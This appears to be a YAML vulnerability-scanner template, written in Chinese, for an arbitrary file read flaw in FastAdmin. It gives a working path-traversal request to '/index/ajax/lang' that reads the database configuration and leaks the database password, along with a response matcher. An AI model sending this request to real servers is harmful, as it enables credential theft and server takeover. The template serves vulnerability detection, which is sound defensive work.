keyword: fastadmin
name: fastadmin任意文件读取漏洞
description: |
  该漏洞会造成数据库密码泄露
requests: 
  path: "/index/ajax/lang?lang=..//..//application/database"
  method: GET
  headers:
    User-agent: 
    Content-length: 
    Accept: 
    Content-type: 
    Accept-Encoding: 
    Cookie: 
    Referer: 
    X-Forwarded-For: 
  body-raw: |-

response: 
  path: "" 
  status-code: 200
  body: "database"
  headers:
    Server: 
    Content-type: 
    Content-length: 
    Date: 
    Connection: 
impact: |
  数据库密码泄露过后，攻击者可获取数据库操作权限进行提权然后攻陷服务器。